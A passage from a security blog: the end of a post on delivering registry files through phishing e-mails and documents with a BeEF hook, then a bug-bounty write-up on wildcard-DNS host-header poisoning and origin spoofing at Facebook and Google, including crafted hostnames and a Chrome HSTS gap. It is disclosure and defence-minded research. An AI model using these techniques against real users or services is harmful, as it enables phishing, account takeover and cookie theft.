<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMSylrpYpV1yobgq0wNxURHItAtpBmgdtKUpJ4K6Q8gHzEeQBC8saOwryx8RiZp45Pd9zJzVsZcEFhJOanw1EonG15pWAmdNZxQdoeTzDrMQelfiAiQee7AplpXc2gumKPL5HIBCQa9Si/s1600/x4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMSylrpYpV1yobgq0wNxURHItAtpBmgdtKUpJ4K6Q8gHzEeQBC8saOwryx8RiZp45Pd9zJzVsZcEFhJOanw1EonG15pWAmdNZxQdoeTzDrMQelfiAiQee7AplpXc2gumKPL5HIBCQa9Si/s1600/x4.PNG" height="140" width="320" /></a></div>
<br />
I tried to use alternative encodings and different XSS vectors, but I could't exploit it properly on Windows. If you have any better idea please <a href="https://twitter.com/bernardomr">let me know</a>.<br />
<br />
<b>2 - Send a .reg to the user and ask him to double click it</b><br />
<br />
Most people won't click on executable attachments on e-mails: that's why <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-cpl-malware/">Brazilian criminals distribute malware using CPL files</a>, for example. Some e-mail providers like Outlook block .reg attachments, but many other services like Gmail won't block them:<br />
<br />
Registry file blocked on Outlook:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUxXvNzyKB4iLtXGF8hshWaO0rzmcY0bJYbR0JRiKx-725RXrf2hpWcF4UnEeeJFuT5Ysp7_DpY5V-FuE1b5Thu0252lDGoRDoYp1tiE_kQ8b0qwz3d-quWY-C9Qfn0R8zI7aD5QbgI7fa/s1600/outlook.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUxXvNzyKB4iLtXGF8hshWaO0rzmcY0bJYbR0JRiKx-725RXrf2hpWcF4UnEeeJFuT5Ysp7_DpY5V-FuE1b5Thu0252lDGoRDoYp1tiE_kQ8b0qwz3d-quWY-C9Qfn0R8zI7aD5QbgI7fa/s1600/outlook.PNG" /></a></div>
Registry File attachment on Gmail:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPteuPjFYpaVJpW7mdnbeoZliGWonDWi8P5AI80N3UNzHVT1i9aXTMY4qJHQDj3ILZ7olEQ1XN5UKGVvqaLspwDRrI14OTofFnsPdkhZ9WYJQELfp_h03A6ABfwyEWKTqFPpKiqbQsD05t/s1600/gmail.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPteuPjFYpaVJpW7mdnbeoZliGWonDWi8P5AI80N3UNzHVT1i9aXTMY4qJHQDj3ILZ7olEQ1XN5UKGVvqaLspwDRrI14OTofFnsPdkhZ9WYJQELfp_h03A6ABfwyEWKTqFPpKiqbQsD05t/s1600/gmail.PNG" height="182" width="320" /></a></div>
<br />
<b>3 - Embed the .reg object on a RTF or Word Document and instruct the user to run it</b><br />
<br />
There's a video for this one, featuring <a href="http://beefproject.com/">BeEF</a>, your favorite <strike>Browser</strike> PDF Reader Exploitation Framework Project =)<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="yes" frameborder="0" height="344" src="//www.youtube.com/embed/74OgNhCDGKo" width="459"></iframe><br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
The interesting part here is that the PDF Reader is not subject to the Same-Origin Policy and the hook can be used as reliable proxy to the internal network.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwlFEqdleCLAmDCxc9ynCY6w43L-um7BXC3H2PLVdkYx9cZjSQ0GARGWa5-WHABAu1-87qN8i62_zv9njKHrmuGmkzJualGDs4mjRm6MWwdiJbxNLZBpQeXZFTYNFbOeElLdSxalEtCYcT/s1600/vid3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwlFEqdleCLAmDCxc9ynCY6w43L-um7BXC3H2PLVdkYx9cZjSQ0GARGWa5-WHABAu1-87qN8i62_zv9njKHrmuGmkzJualGDs4mjRm6MWwdiJbxNLZBpQeXZFTYNFbOeElLdSxalEtCYcT/s1600/vid3.PNG" height="176" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This is also one of the rare scenarios where you can run "localhost" exploits from BeEF, as long as the user accepts the prompted ActiveX warning:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz4pz5B4nKrARaG7BN_drFQhvolm_zisRDs7D3HFuQmIrQAQ5UCyQ8xYHWb0lNMQ2iMwUWChY-cSVWqbNvxIL_IdgMmVXTBN83HvLddZVmtxZu_pOVPX9VPYiPae8h_aouAOMug_wGWiKD/s1600/vid1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz4pz5B4nKrARaG7BN_drFQhvolm_zisRDs7D3HFuQmIrQAQ5UCyQ8xYHWb0lNMQ2iMwUWChY-cSVWqbNvxIL_IdgMmVXTBN83HvLddZVmtxZu_pOVPX9VPYiPae8h_aouAOMug_wGWiKD/s1600/vid1.PNG" height="154" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFN0ks98B5PiTO8hOoKYmF6seodkPZ0IXY31TpLatib_2DU4uOGphkV_svgaQq2QGQkibaDYfgdyQVRkcjT3dKxDHFVonE_q9C9591GoQo1iqwAXgdnolO2zWntHWdP5cBenknqReXGd0w/s1600/vid2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFN0ks98B5PiTO8hOoKYmF6seodkPZ0IXY31TpLatib_2DU4uOGphkV_svgaQq2QGQkibaDYfgdyQVRkcjT3dKxDHFVonE_q9C9591GoQo1iqwAXgdnolO2zWntHWdP5cBenknqReXGd0w/s1600/vid2.PNG" height="396" width="640" /></a></div>
<br />
<br />
<b>Conclusion</b></div>
<div>
<b><br /></b>
You may be asking "why not embed a malware on the document?". Firstly because this is a noisy technique and most AV/whitelisting products would detect this attempt. You could also modify the user's registry to <a href="http://www.shelliscoming.com/2013/12/metasploit-controlling-internet.html">load a PAC file on the browser</a> or use powershell scripts to bypass some restrictions, but in this case there would be no need for this blog post =)<br />
<br /></div>
<div>
It doesn't matter how secure your product is or how much vulnerabilities were disclosed for it: if you're targeted by big Offensive players, you're certainly getting pwned. If other less sophisticated attackers want to attack you, they'll pwn you as well, because people still fall for phishing.<br />
<br />
What makes your security posture better is how you detect and respond to these threats. I like approaches like the one described by Haifei Li & Chong Xu at CanSecWest 2014. Their talk on <a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a> described how "DNA comparison" can be used to flag and detect application's unusual behavior, leading to exploit discovery:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3GGw-I6RbNpBED5SdpFhGQfcWJ-0vf-DehdkvlEGr1B9wXjB1cc-c2t8L5H8Ff1Woa3xd0I_1sD7pwfi7kpr4AUheoXes5bPk6Zt2UV868R8c1lowavGpu5DhI8rVPOFJTVpy8i2J8CMi/s1600/slides.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3GGw-I6RbNpBED5SdpFhGQfcWJ-0vf-DehdkvlEGr1B9wXjB1cc-c2t8L5H8Ff1Woa3xd0I_1sD7pwfi7kpr4AUheoXes5bPk6Zt2UV868R8c1lowavGpu5DhI8rVPOFJTVpy8i2J8CMi/s1600/slides.PNG" height="235" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a>, Haifei Li & Chong Xu (CanSecWest 2014)</td></tr>
</tbody></table>
<br />
In this simple phishing scenario, Microsoft Word (and WordPad) drops a registry file on the %TEMP% folder as soon as the file is opened. This is clearly an unusual behavior and should be flagged by security solutions. This could also be used as an IOC to analyze big sets of files/documents.<br />
<br />
<a href="https://twitter.com/randomdross">David Ross</a> made a post recently describing lots of different scenarios for XSS persistence. This is yet another XSS persistence mechanism that could be used to backdoor compromised systems, for example.<br />
<div>
<br /></div>
I hope you enjoyed this two page write-up about XSS, because, you know, everybody likes hearing about cool hacking techniques and...<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiawIsIRQ1GLE-fMXsp_c1ITwfKVtDaGYT43OgSlDs1E-efeurQZ3WKbhzp4TjKFqL_o5Ji_Ec5ZDoedT1oYYANg4pBhCi3nQamXmKdlIIwU8oSirNBEKqxNx37ypH4ipLoGnflcaJiBVjA/s1600/xss1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiawIsIRQ1GLE-fMXsp_c1ITwfKVtDaGYT43OgSlDs1E-efeurQZ3WKbhzp4TjKFqL_o5Ji_Ec5ZDoedT1oYYANg4pBhCi3nQamXmKdlIIwU8oSirNBEKqxNx37ypH4ipLoGnflcaJiBVjA/s1600/xss1.PNG" /></a></div>
<br />
...Well, at least there was a cool Youtube video showing a cool BeEF hook and...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrQrCbgTtviQJXCr545amvGDi-MgPGea8ELflKIEVmExeljK03leoGQCiBFG68tgty7nGLIIYkQRLgeOallp8fWJLIY4YvY6sJdYsFR_kau3wFM5-meYIcG8MHIK0r4KNtKr2qtCr94Ep0/s1600/xss2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrQrCbgTtviQJXCr545amvGDi-MgPGea8ELflKIEVmExeljK03leoGQCiBFG68tgty7nGLIIYkQRLgeOallp8fWJLIY4YvY6sJdYsFR_kau3wFM5-meYIcG8MHIK0r4KNtKr2qtCr94Ep0/s1600/xss2.PNG" /></a></div>
<div>
<br /></div>
<div>
Hm, I'd better finish this post with a Dilbert comic.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dilbert.com/strips/comic/2014-05-19/"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_B_tqtTxYT2vZZ9TaCVkb8_kJI5toVnlKdXXCNmId3lf0jGKw2CcqqpZMSX3Y16l7g9jEg3fL6mHzr2on9WeVE625QHWRdpS2vGHxxLFOGqj_4c_lR8R8QY01G1coZNt8bv7kd3-_YHKe/s1600/221657.strip.gif" height="198" width="640" /></a></div>
</div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-19312891417731437072014-03-31T11:36:00.001-03:002014-07-16T23:40:46.147-03:00Wildcard DNS, Content Poisoning, XSS and Certificate PinningHi everyone, this time I'm going o talk about an interesting vulnerability that I reported to Google and Facebook a couple of months ago. I had some spare time last October and I started testing for vulnerabilities on a few companies with established bug bounty programs. Google awarded me with $5000,00 and Facebook payed me $500,00 for reporting the bugs.<br />
<br />
I know you may be more interested on highly sophisticated exploits that allow <a href="http://seclists.org/fulldisclosure/2014/Mar/123">arbitrary file upload to the Internet</a>, with custom payloads that may lead to unexpected behavior like <a href="http://seclists.org/fulldisclosure/2014/Mar/332">closing Security Lists</a>. Hopefully this class of bugs is already <a href="http://seclists.org/fulldisclosure/2014/Mar/333">patched by Fyodor</a> and Attrition is offering an <a href="http://attrition.org/postal/asshats/">efficient exploit mitigation technique</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The title may be a little confusing, but I'm going to show that it's possible to combine all these techniques to exploit vulnerable systems.<br />
<br />
<b>Content Poisoning and Wildcard DNS</b><br />
<br />
Host header poisoning occurs when the application doesn't validate full URL's generated from the HTTP Host header, including the domain name. Recently, the <a href="https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/">Django Framework</a> fixed a few vulnerabilities related to that and <a href="https://twitter.com/albinowax">James Kettle</a> made an interesting <a href="http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html">post discussing lots of attack scenarios</a> using host header attacks.<br />
<br />
While testing this issue, I found a different kind of Host header attack that abuses the possibility to browse wildcard domains. Let's have a quick look at the <a href="https://en.wikipedia.org/wiki/Hostname">Wikipedia entry on Hostnames</a>:<br />
<blockquote class="tr_bq">
<div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;">
"The Internet standards (<a href="https://en.wikipedia.org/wiki/Request_for_Comments" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Request for Comments">Request for Comments</a>) for protocols mandate that component hostname labels may contain only the <a href="https://en.wikipedia.org/wiki/ASCII" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="ASCII">ASCII</a> letters 'a' through 'z' (in a case-insensitive manner), the digits '0' through '9', and the <a href="https://en.wikipedia.org/wiki/Hyphen" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Hyphen">hyphen</a> ('-'). <b>The original specification of hostnames in <a class="external mw-magiclink-rfc" href="https://tools.ietf.org/html/rfc952" rel="nofollow" style="background-image: linear-gradient(transparent, transparent), url(data:image/svg+xml; background-position: 100% 50%, 100% 50%; background-repeat: no-repeat no-repeat; color: #663366; padding-right: 13px; text-decoration: none;">RFC 952</a>, mandated that labels could not start with a digit or with a hyphen, and must not end with a hyphen</b>. However, a subsequent specification (<a class="external mw-magiclink-rfc" href="https://tools.ietf.org/html/rfc1123" rel="nofollow" style="background-image: linear-gradient(transparent, transparent), url(data:image/svg+xml; background-position: 100% 50%, 100% 50%; background-repeat: no-repeat no-repeat; color: #663366; padding-right: 13px; text-decoration: none;">RFC 1123</a>) permitted hostname labels to start with digits. No other symbols, punctuation characters, or white space are permitted."</div>
</blockquote>
The fun part here is that the network stack from Windows, Linux and Mac OS X consider domains like -www.plus.google.com, www-.plus.google.com and www.-.plus.google.com valid. It's interesting to note that Android won't resolve these domains for some reason.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gx1JoqQRqQYKRS2bt9eY28bh_giwwy7SWD2qRNuzOOE0Rokj5OkPWsf-EuTOZMLUccPr8j4VRD28C_4ttiJSXfcmFnWt5peY-6Eh-v0uG4-sfqmWT9AaTOooovOgkgbIyqi019A60CRm/s1600/Screenshot_2014-03-30-10-54-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gx1JoqQRqQYKRS2bt9eY28bh_giwwy7SWD2qRNuzOOE0Rokj5OkPWsf-EuTOZMLUccPr8j4VRD28C_4ttiJSXfcmFnWt5peY-6Eh-v0uG4-sfqmWT9AaTOooovOgkgbIyqi019A60CRm/s1600/Screenshot_2014-03-30-10-54-39.png" height="240" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCA-JGBIVkjfwY3fKGxg0M9fksauEvyftUo23D3SZqoiL5KUSi8CoA-Ltx0ltAusVNUxzh-mlGNz297HZtzFCzY4xHuBDmKWfX7Vc0gxqlUs7SJHEn4KTn5306jDFHltsd1c3hBTT3_8Xv/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCA-JGBIVkjfwY3fKGxg0M9fksauEvyftUo23D3SZqoiL5KUSi8CoA-Ltx0ltAusVNUxzh-mlGNz297HZtzFCzY4xHuBDmKWfX7Vc0gxqlUs7SJHEn4KTn5306jDFHltsd1c3hBTT3_8Xv/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" height="192" width="640" /></a></div>
<br />
Take, for example, the following URL: https://www.example.com.-.www.sites.google.com. If we compose an e-mail and paste it on the body, GMail will split them and the received message will have two “clickable” parts (<a href="https://www.example.com/">https://www.example.com</a> and <a href="http://sites.google.com/">sites.google.com</a>).<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBahAnHu_sFjIsq0eWbYQ5y6AL3r6BzVqW8xbnjvk5kfUj-EQjQDEPW1kUeT47nbCmDHff1iDjoSgXCdEhemNmLpbBd6jJJwxQIBBArfG4952scSbra0aiF_jHegqHl0cP6AzJxUQwXrv1/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBahAnHu_sFjIsq0eWbYQ5y6AL3r6BzVqW8xbnjvk5kfUj-EQjQDEPW1kUeT47nbCmDHff1iDjoSgXCdEhemNmLpbBd6jJJwxQIBBArfG4952scSbra0aiF_jHegqHl0cP6AzJxUQwXrv1/s1600/test.png" height="156" width="640" /></a></div>
<br />
Most e-mail based notification use the very same host you are browsing in order to compose the notification messages: you see where this is going, right?<br />
<br />
Facebook has a wildcard DNS entry at zero.facebook.com. In order to exploit the flaw, we have to browse the service using a poisoned URL and perform actions that may need e-mail confirmation, checking whether Facebook mails the crafted URL to the user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhablmuBSRnfIiNRUil4-Qy4VyoHaW5ZXAWSJTCN7FJwN_gYy-iwk-Bo28m9o12M3BNCbVcKXHt1q8WLK7-44F0yFN3IHIhyke19IfaBowywZ6fxpzlYQBRP4OD_Xk_G3mpM8zpOE2SuQws/s1600/header2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhablmuBSRnfIiNRUil4-Qy4VyoHaW5ZXAWSJTCN7FJwN_gYy-iwk-Bo28m9o12M3BNCbVcKXHt1q8WLK7-44F0yFN3IHIhyke19IfaBowywZ6fxpzlYQBRP4OD_Xk_G3mpM8zpOE2SuQws/s1600/header2.PNG" height="324" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The only vulnerable endpoint that I found affected by this issue was the registration e-mail confirmation. You may be asking, how could one exploit this to attack a legitimate user?<br />
<br />
Suppose I want to attack the Facebook account from goodguy@example.com. I can create or associate a "duplicate" account using the "+" sign by browsing Facebook with these injected URL's. If I navigate to Facebook using an URL like https://www.example.com.-.zero.facebook.com, all I have to do is create the duplicate account goodguy+DUPLICATE@example.com. Most e-mail services like GMail and Hotmail don't consider what you type after the "+" and forward it to the original account.<br />
<br />
In this case, all e-mails that Facebook sent to confirm that association had the poisoned links.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWSXkcKOV6hwDxYEpIdO4vs3V3CvQR46UUjm-pi6AUTkkkPJ7hM1RisyTgGFyJ2IU8FOR-SheIQvPRxhgAVL0Z5PpW8hZQdIeMS7EmMNls-CLUVommClrSdciK0LLYlm8EWGM_ea96o2xG/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWSXkcKOV6hwDxYEpIdO4vs3V3CvQR46UUjm-pi6AUTkkkPJ7hM1RisyTgGFyJ2IU8FOR-SheIQvPRxhgAVL0Z5PpW8hZQdIeMS7EmMNls-CLUVommClrSdciK0LLYlm8EWGM_ea96o2xG/s1600/Capturar.PNG" height="170" width="640" /></a></div>
<br />
This can also be used to poison password reset emails, but Facebook forms were not affected. They quickly fixed that by hard coding the proper URL to their e-mail confirmation system. It's also possible (but not recommended) to fix these issues by sending notifications with relative links instead of complete URL's ("please click <a href="http://www.example.com.-.zero.facebook.com/">here</a>" instead of "please click on the specified url: <a href="http://www.example.com/">www.example.com</a>.-.<a href="http://zero.facebook.com/">zero.facebook.com</a>").<br />
<br />
<b>XSS and Wildcard DNS</b><br />
<br />
While searching for these issues on Google I quickly found wildcard domains like:<br />
<br />
- <a href="https://w00t.drive.google.com/">https://w00t.drive.google.com</a><br />
- <a href="https://w00t.script.google.com/">https://w00t.script.google.com</a><br />
- <a href="https://w00t.sites.google.com/">https://w00t.sites.google.com</a><br />
<br />
In case you're wondering how to quickly find these wildcard domains, you can download and lookup for them on the <a href="https://scans.io/">scans.io datasets</a>. You can find these references on the Reverse DNS records or by searching for SSL certificates issued to wildcard domains, like *.sites.google.com.<br />
<br />
During my initial tests, I was unable to craft URL's using .-. inside the drive.google.com domain (got 500 error messages) and all I could do was creating URL’s like this: https://www.example.com-----www.drive.google.com.<br />
<br />
When you browse Google Drive using this URL, upload a File to a Folder and try to Zip/Download it asking for an e-mail confirmation (“Email when ready”), the e-mail confirmation message will be like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgok_th8Lf4ndxNUfkG5ryVEov4XMk_rvO81aj_Mjw98emKgn3wB8x04aTh5NZcpxYvTsNnw3omw5yN98LLXKe3AxtL9QD3eIFm9Bz-VaLmGdZF3VwyheRPyndIYd0CiDhs2Tvw2agbKUrm/s1600/zipp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgok_th8Lf4ndxNUfkG5ryVEov4XMk_rvO81aj_Mjw98emKgn3wB8x04aTh5NZcpxYvTsNnw3omw5yN98LLXKe3AxtL9QD3eIFm9Bz-VaLmGdZF3VwyheRPyndIYd0CiDhs2Tvw2agbKUrm/s1600/zipp.PNG" height="170" width="640" /></a></div>
<br />
The "ready for downloading" link would point to https://www.example.com-----www.drive.google.com/export-result?archiveId=REDACTED. So far no big deal, I was still unable to poison the links... And phishing yourself is not that useful =)<br />
<br />
I kept testing different URL's until I found a weird behavior on Google DNS Servers. When typing URL's containing a domain you control followed by a certain number of "-" and the wildcard domain from Google, the resolved IP would be the one from the URL you control.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI6IAAvGEKo1Ud-jZTT8buenfdKpcEj14wqjfOaO7CFBmqMzwH2CGThDOdBcpaI_ITGlDNxnwndGFTbq_XAQJRzdkLVdShLfrRYN6nFVR98-LAqeZHnAZMAmWv7XGp-Y_9wnCZ96K7zIAK/s1600/dns.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI6IAAvGEKo1Ud-jZTT8buenfdKpcEj14wqjfOaO7CFBmqMzwH2CGThDOdBcpaI_ITGlDNxnwndGFTbq_XAQJRzdkLVdShLfrRYN6nFVR98-LAqeZHnAZMAmWv7XGp-Y_9wnCZ96K7zIAK/s1600/dns.PNG" height="538" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">My highly sophisticated Fuzzer in action</td></tr>
</tbody></table>
For some reason, there was a glitch on their DNS servers, more specifically in the regexp that stripped "--" from the domain prefixes. I'm not sure why they performed these checks but that may have something to do with <a href="https://en.wikipedia.org/wiki/Internationalized_domain_name">Internationalized Domain Names</a>.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://xkcd.com/1171/" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW908ww4jxnv-wLoQf7RAc6YBftcw6gXh4bNa5N0zOcmzMkDHxeeX0pjuRHA6pLwrKaLZ3qSbg0EJxvfviCrm4M1KRXLYOjyKNwrDSGGPgFtz5Nhx9_dLGffRQMYoAsWtMYZb2zc8MN4Gl/s1600/perl_problems.png" height="238" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">XKCD's take on the bug</td></tr>
</tbody></table>
Some Google domains affected by this issue (October 2013):<br />
<br />
- <a href="https://www.blogger.com/goog_622517707">docs.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">docs.sandbox.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">drive.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">drive.sandbox.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">glass.ext.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">prom-qa.sandbox.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">prom-test.sandbox.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">sandbox.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">script.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">script.sandbox.google.com</a><br />
- <a href="https://www.blogger.com/goog_622517707">sites.google.com</a><br />
- <a href="http://sites.sandbox.google.com/">sites.sandbox.google.com</a><br />
<div>
<br /></div>
<div>
Now that I can impersonate a Google's domain, it's possible abuse the Same Origin policy and issue requests on behalf of a logged user. <a href="http://twitter.com/lcamtuf">lcamtuf</a> already told us about <a href="http://lcamtuf.blogspot.com.br/2010/10/http-cookies-or-how-not-to-design.html">HTTP cookies, or how not to design protocols</a>. What happens if we control www.example.com and the logged user from drive.google.com visits the crafted URL http://www.example.com---.drive.google.com?</div>
<div>
<br /></div>
<div>
Request goes to legitimate site:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKjM6lTpUpORuJ65bF1doXVVlOXVgoCgkp7O0DuVApOmRsoLP_0pMT8dYH6LsU95lKURN0gkq_mNtBeuM_GFNZVspOQO9wQjdmEej61LOEkE6Ovp_GnA4qIbGwjgIAF7rnnPffvq53Ynd/s1600/req1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKjM6lTpUpORuJ65bF1doXVVlOXVgoCgkp7O0DuVApOmRsoLP_0pMT8dYH6LsU95lKURN0gkq_mNtBeuM_GFNZVspOQO9wQjdmEej61LOEkE6Ovp_GnA4qIbGwjgIAF7rnnPffvq53Ynd/s1600/req1.PNG" height="520" width="640" /></a></div>
<br />
Requests goes to the user-controlled site, in this case my own server running nginx:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7PFfgkTN_CGlt9AHP3Ww2-GZ5dmtO-ExguzK0c_FQSrDLy5mvqRIezPATbnG-lB2IECEqJO66J2BDaKMAv2zLbovg0q4aTFrbGJqWO8xNVAJWnna6xQrXs0X48uukFSaIGavn_LKePD6/s1600/req2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7PFfgkTN_CGlt9AHP3Ww2-GZ5dmtO-ExguzK0c_FQSrDLy5mvqRIezPATbnG-lB2IECEqJO66J2BDaKMAv2zLbovg0q4aTFrbGJqWO8xNVAJWnna6xQrXs0X48uukFSaIGavn_LKePD6/s1600/req2.PNG" height="520" width="640" /></a></div>
<div>
<br />
This leverages to a XSS-like attack: you have now bypassed the same origin and you can steal cookies and run scripts on the context of the site, for example.<br />
<br /></div>
<b>Certificate Pinning and Wildcard DNS</b><br />
<br />
So far so good, but what if we were performing the same tests on Google Chrome, which enforces Certificate Pinning for their domains? I didn't notice at first, but I accidentally found an issue on Chrome too: it was failing to perform the proper HSTS checks for these non-RFC compliant domains.<br />
<br />
Other parts of the network stack were processing and fetching results from these "invalid" DNS names, but TransportSecurityState was rejecting them and therefore HSTS policies didn't apply. They simply removed the sanity checks to make TransportSecurityState more promiscuous in what it process.<br />
<br />
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
